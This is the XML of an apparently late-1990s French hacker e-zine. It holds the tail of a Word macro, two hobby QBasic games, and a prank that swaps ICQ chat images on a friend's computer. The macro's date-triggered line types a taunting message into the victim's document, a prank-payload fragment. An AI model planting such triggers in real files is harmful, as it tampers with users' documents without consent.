          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>If Day(Now) = Minute(Now) Then Selection.TypeText " ß ñëèøêîì øóñòðûé äëÿ òåáÿ !!! "</w:t>
      </w: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Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="000000"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>End Sub</w:t>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 w:leader="none"/>
        </w:tabs>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FR"/>
        </w:rPr>
        <w:t>2.19 Codes de programmes en Qbasic, par Cla</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>d Strife</w:t>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es codes sources qui vont suivre sont des codes sources à compiler avec Qbasic.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On n'en mettra que 2 pour ne pas trop charge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e premier: une attaque de martien by Sylvia Cabañas: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 DECLARACION DE VARIABLE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isparo = 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avX =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avY = 2</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balX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balY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X = 4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Y = 2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hx = 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hy = Y</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CL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Y, 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O</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TECLA$ = INKEY$</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tiempo = tiempo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tbala = tbala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tiempo &gt; 100 THE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tiempo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navY, nav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avX = navX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navX &gt; 70 THE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avX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avY = navY + 2</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ND IF</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navY &gt; 23 THE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avY = 23</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avX =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ND IF</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ND IF</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tbala &gt; 50 AND disparo = 1 THE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tbala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balY, bal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balY = balY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balY &lt; 2 THE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isparo = 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balY, bal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LSE</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balY, bal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ND IF</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ND IF</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 Choque</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navX + 1 = X AND navY = Y THE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navY - 1, nav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navY, nav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navY + 1, nav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ND IF</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 Balazo</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navX + 1 = balX AND navY = balY THE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navY - 1, nav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navY, nav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navY + 1, nav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avX =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avY = 2</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ND IF</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navY, nav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o\"</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TECLA$</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gt; "; ASC(TECLA$); ASC(RIGHT$(TECLA$,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TECLA$ = CHR$(0) + CHR$(77) THEN X = X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TECLA$ = CHR$(0) + CHR$(75) THEN X = X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TECLA$ = CHR$(0) + CHR$(72) THEN Y = Y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TECLA$ = CHR$(0) + CHR$(80) THEN Y = Y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TECLA$ = " " AND disparo = 0 THE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isparo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balX = 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balY = Y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ND IF</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SELECT CASE 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CASE IS &gt; 8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X = 8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CASE IS &lt;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X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ND SELECT</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SELECT CASE Y</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CASE IS &gt; 23</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Y = 23</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CASE IS &lt;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Y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ND SELECT</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hx &lt;&gt; X OR hy &lt;&gt; Y THE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hy, h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hx = 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hy = Y</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OCATE Y, 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X"</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ND IF</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lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>LOOP</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e second se caractérise par le fait que vous soyez un ver de terre dans un labyrinthe vivant par Clément HEDON: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22 CL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SCREEN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50, 10)-(20,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0, 10)-(20, 4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0, 40)-(50, 4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50, 40)-(50, 7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50, 70)-(20, 7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65, 10)-(115,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90, 10)-(90, 7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30, 10)-(175,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75, 10)-(175, 7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75, 70)-(130, 7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30, 70)-(130,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90, 10)-(190, 7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90, 10)-(230,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30, 10)-(230, 4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30, 40)-(190, 4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90, 40)-(230, 7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45, 10)-(245, 7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45, 10)-(273, 4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73, 40)-(301,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301, 10)-(301, 7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5, 5)-(306, 5)</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306, 5)-(306, 75)</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306, 75)-(15, 75)</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5, 75)-(15, 5)</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Version 2"</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Pour jouer"</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Appuyez sur a"</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110)-(200, 1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00, 110)-(200, 15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00, 150)-(80, 15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150)-(80, 1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C)Copyright Clem Hedon Corp. 1999"</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15 IF INKEY$ = CHR$(97) THEN GOTO 3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15</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30 CL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Quelle difficul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1 = facile"</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2 = moye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3 = difficile"</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4 = impossible"</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70, 10)-(240,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40, 10)-(240, 3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40, 30)-(70, 3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70, 30)-(70,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16 c$ = INKEY$</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c$ = CHR$(49) THEN GOTO 17</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c$ = CHR$(50) THEN GOTO 18</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c$ = CHR$(51) THEN GOTO 19</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c$ = CHR$(52) THEN GOTO 2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16</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17 s = 20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2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18 s = 10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2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19 s = 5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2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20 s =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2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21 r = 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0 CL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SCREEN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RANDOMIZE TIMER</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b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c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 = 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e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f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h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j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k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m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o = INT(RND * 100)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40, 0)-(40, b)</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40, b + 20)-(4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60, 0)-(60, c)</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60, c + 15)-(6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0)-(80, d)</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 + 20)-(8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80, d + 20), couleur%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00, 0)-(100, e)</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00, e + 15)-(10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20, 0)-(120, f)</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20, f + 15)-(12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40, 0)-(140, g)</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40, g + 15)-(14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60, 0)-(160, h)</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60, h + 15)-(16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80, 0)-(180, i)</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180, i + 15)-(18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00, 0)-(200, j)</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00, j + 10)-(20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20, 0)-(220, k)</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20, k + 10)-(22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40, 0)-(240, l)</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40, l + 10)-(24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60, 0)-(260, m)</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60, m + 10)-(26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80, 0)-(280, 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80, n + 10)-(28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300, 0)-(300, o)</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300, o + 5)-(30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 = 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q = 1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1 PSET (p, q)</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40 AND q &lt;= b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40 AND q &gt;= b + 2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60 AND q &lt;= c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60 AND q &gt;= c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00 AND q &lt;= e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00 AND q &gt;= e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20 AND q &lt;= f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20 AND q &gt;= f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40 AND q &lt;= g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40 AND q &gt;= g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60 AND q &lt;= h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60 AND q &gt;= h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80 AND q &lt;= i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80 AND q &gt;= i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00 AND q &lt;= j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00 AND q &gt;= j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20 AND q &lt;= k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20 AND q &gt;= k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40 AND q &lt;= l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40 AND q &gt;= l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60 AND q &lt;= m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60 AND q &gt;= m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80 AND q &lt;= n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80 AND q &gt;= n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00 AND q &lt;= o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00 AND q &gt;= o + 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d = 180 THEN GOTO 5</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80 AND q &lt;= d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80 AND q &gt;= d + 2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20 THEN GOTO 8</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0)-(80, d)</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 + 20)-(8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80, d + 20), couleur%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 = d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 = p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c$ = INKEY$</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c$ = CHR$(53) THEN GOTO 2</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c$ = CHR$(50) THEN GOTO 3</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FOR z = 1 TO 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EXT</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2 PSET (p, q)</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40 AND q &lt;= b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40 AND q &gt;= b + 2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60 AND q &lt;= c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60 AND q &gt;= c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00 AND q &lt;= e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00 AND q &gt;= e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20 AND q &lt;= f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20 AND q &gt;= f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40 AND q &lt;= g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40 AND q &gt;= g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60 AND q &lt;= h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60 AND q &gt;= h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80 AND q &lt;= i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80 AND q &gt;= i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00 AND q &lt;= j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00 AND q &gt;= j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20 AND q &lt;= k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20 AND q &gt;= k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40 AND q &lt;= l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40 AND q &gt;= l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60 AND q &lt;= m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60 AND q &gt;= m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80 AND q &lt;= n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80 AND q &gt;= n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00 AND q &lt;= o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00 AND q &gt;= o + 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q &lt;= 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d = 180 THEN GOTO 6</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80 AND q &lt;= d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80 AND q &gt;= d + 2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0)-(80, d)</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 + 20)-(8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80, d + 20), couleur%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 = d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q = q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INKEY$ = CHR$(51) THEN GOTO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FOR z = 1 TO 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EXT</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2</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3 PSET (p, q)</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40 AND q &lt;= b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40 AND q &gt;= b + 2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60 AND q &lt;= c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60 AND q &gt;= c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00 AND q &lt;= e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00 AND q &gt;= e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20 AND q &lt;= f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20 AND q &gt;= f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40 AND q &lt;= g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40 AND q &gt;= g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60 AND q &lt;= h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60 AND q &gt;= h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80 AND q &lt;= i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80 AND q &gt;= i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00 AND q &lt;= j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00 AND q &gt;= j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20 AND q &lt;= k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20 AND q &gt;= k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40 AND q &lt;= l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40 AND q &gt;= l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60 AND q &lt;= m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60 AND q &gt;= m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80 AND q &lt;= n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80 AND q &gt;= n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00 AND q &lt;= o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00 AND q &gt;= o + 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q &gt;= 20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d = 180 THEN GOTO 7</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80 AND q &lt;= d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80 AND q &gt;= d + 2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0)-(80, d)</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 + 20)-(8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80, d + 20), couleur%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 = d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q = q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INKEY$ = CHR$(51) THEN GOTO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FOR z = 1 TO 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EXT</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3</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5 PSET (p, q)</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40 AND q &lt;= b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40 AND q &gt;= b + 2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60 AND q &lt;= c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60 AND q &gt;= c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00 AND q &lt;= e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00 AND q &gt;= e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20 AND q &lt;= f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20 AND q &gt;= f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40 AND q &lt;= g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40 AND q &gt;= g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60 AND q &lt;= h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60 AND q &gt;= h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80 AND q &lt;= i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80 AND q &gt;= i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00 AND q &lt;= j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00 AND q &gt;= j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20 AND q &lt;= k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20 AND q &gt;= k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40 AND q &lt;= l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40 AND q &gt;= l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60 AND q &lt;= m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60 AND q &gt;= m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80 AND q &lt;= n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80 AND q &gt;= n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00 AND q &lt;= o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00 AND q &gt;= o + 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d = 0 THEN GOTO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80 AND q &lt;= d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80 AND q &gt;= d + 2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20 THEN GOTO 8</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0)-(80, d)</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 + 20)-(8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80, d + 20), couleur%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 = d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 = p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c$ = INKEY$</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c$ = CHR$(53) THEN GOTO 6</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c$ = CHR$(50) THEN GOTO 7</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FOR z = 1 TO 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EXT</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5</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6 PSET (p, q)</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40 AND q &lt;= b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40 AND q &gt;= b + 2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60 AND q &lt;= c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60 AND q &gt;= c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00 AND q &lt;= e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00 AND q &gt;= e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20 AND q &lt;= f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20 AND q &gt;= f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40 AND q &lt;= g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40 AND q &gt;= g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60 AND q &lt;= h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60 AND q &gt;= h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80 AND q &lt;= i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80 AND q &gt;= i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00 AND q &lt;= j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00 AND q &gt;= j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20 AND q &lt;= k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20 AND q &gt;= k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40 AND q &lt;= l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40 AND q &gt;= l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60 AND q &lt;= m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60 AND q &gt;= m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80 AND q &lt;= n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80 AND q &gt;= n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00 AND q &lt;= o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00 AND q &gt;= o + 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q &lt;= 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d = 0 THEN GOTO 2</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80 AND q &lt;= d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80 AND q &gt;= d + 2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0)-(80, d)</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 + 20)-(8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80, d + 20), couleur%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 = d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q = q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INKEY$ = CHR$(51) THEN GOTO 5</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FOR z = 1 TO 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EXT</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6</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7 PSET (p, q)</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40 AND q &lt;= b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40 AND q &gt;= b + 2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60 AND q &lt;= c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60 AND q &gt;= c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00 AND q &lt;= e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00 AND q &gt;= e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20 AND q &lt;= f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20 AND q &gt;= f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40 AND q &lt;= g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40 AND q &gt;= g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60 AND q &lt;= h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60 AND q &gt;= h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80 AND q &lt;= i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180 AND q &gt;= i + 1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00 AND q &lt;= j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00 AND q &gt;= j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20 AND q &lt;= k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20 AND q &gt;= k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40 AND q &lt;= l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40 AND q &gt;= l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60 AND q &lt;= m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60 AND q &gt;= m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80 AND q &lt;= n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280 AND q &gt;= n + 1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00 AND q &lt;= o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300 AND q &gt;= o + 5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q &gt;= 20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d = 0 THEN GOTO 3</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80 AND q &lt;= d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p = 80 AND q &gt;= d + 20 THEN GOTO 4</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0)-(80, d)</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 + 20)-(80, 20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80, d)-(80, d + 20), couleur%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d = d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q = q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INKEY$ = CHR$(51) THEN GOTO 5</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FOR z = 1 TO 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NEXT</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7</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4 CL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Vous avez perdu"</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Nombre de point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r</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Appuyez sur a"</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90, 10)-(220,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20, 10)-(220, 3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20, 30)-(90, 3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90, 30)-(90,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11 IF INKEY$ = CHR$(97) THEN GOTO 9</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1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8 CL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r = r + 1</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s = s - 5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Vous avez gag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Appuyez sur a"</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90, 10)-(220,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20, 10)-(220, 3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220, 30)-(90, 3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LINE (90, 30)-(90,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10 IF INKEY$ = CHR$(97) THEN GOTO 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10</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9 CLS</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Voulez vous recommencer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o = Oui"</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PRINT " n = Non"</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13 c$ = INKEY$</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c$ = CHR$(111) THEN GOTO 22</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IF c$ = CHR$(110) THEN GOTO 12</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18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>GOTO 13</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>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Courier New" w:cs="Courier New" w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>12 END</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman" w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>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 Faire apparaitre des images dans un chat ICQ</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="708"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La technique est simple et ne s'applique pas qu'à ICQ. Allez dans le répertoire:</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ICQ - Bitmaps - Chat</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teBrowser</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Regardez les images sont en format .bmp, effacez en quelques-unes en prenant bien soin de noter le nom comme il est. Prenez une image .bmp, renommez là, mettez là dans le répertoire Cjat ou AteBrowser</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lancez un chat et faites l'action correspondant à l'image!</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Problème: y'a que vous qui verrez l'image comme vous l'avez changé: l'icq de votre correspondant lancera les images qui sont sur le HD de votre correspondant! N'empêche que c'ets une bonne joke à faire à un copian quand vous êtes chez lui. </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
          <w:tab w:val="left" w:pos="70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rPr>
        <w:t>Il n'y a pas que sur ICQ qu'on peut faire ça mais un peu sur tout les programm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nc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st déja fini pour le zine #2... eh oui! Jespere que ce e-zine vous a été utile p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tre carriere de Grand hacker :) Pour plus d'information sur les QHA venez sur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nnel #QHA (IRC/Undernet) et venez nous voir! Ou bien aller a www.q-h-a.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e-zine #3 devrais suivre dans pas trop longtemps... Le decors de ce e-zine a é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it par Dukester... mais le gros du e-zine donc toute les article etc etc, p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d Strife, donc Merci beaucoup Clad Strife!!!!!!!!!!!!!!!!!!!! et Merci a toute ce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i ont lu et aimé notre z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D STRIFE (clad_strife@hotmail.com) &amp; DUKEST4R (dukester@heh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swiss"/>
    <w:pitch w:val="default"/>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